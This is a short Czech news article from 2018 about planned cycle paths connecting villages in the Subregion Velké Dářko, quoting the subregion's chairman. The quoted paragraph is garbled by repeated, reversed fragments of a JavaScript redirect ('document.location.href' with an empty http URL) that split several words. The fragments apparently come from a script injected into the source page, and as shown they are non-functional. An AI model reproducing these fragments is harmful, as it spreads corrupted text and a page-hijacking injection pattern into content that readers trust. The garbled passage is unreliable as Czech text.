Rainbow page separator

Subregion Velké Dářko i jeho okolí propojí nové cyklostezky

Pondělí, 26. března 2018

Cyklostezka

Žďársko / Bezpečný pohyb chodců i cyklistů na Žďársku slibuje projekt s názvem Cyklostezky v regionu Velké Dářko. Jedná se o společný záměr obcí spolupracujících v dobrovolném sdružení Subregion Velké Dářko.
„V současné době jsou dokončovány práce na projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentaci pro územní rozhodnutí, která v sobě zahrnuje propojení obcí Polnička – Škrdlovice – Karlov – Radostín – Vojnův Městec a ze Škrdlovic dále také na druhou stranu do katastrů obcí kolem Světnova. Ze Světnova by cyklostezka měla pokračovat do Stržanova a Žďáru nad Sázavou. Jsem rád, že se do té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akce zapojily také Herálec, Svratka a Svra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];touch, což význam a přínos projektu podle mého názoru ještě zvyšuje,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval starosta Škrdlovic a předseda Subregionu Velké Dářko Ivan Hořínek.
Subregion Velké Dářko byl založen v roce 1999, jeho členy jsou obce Škrdlovice, Vojnův Městec, Polnička, Světnov, Cikháj, Karlov a Radostín.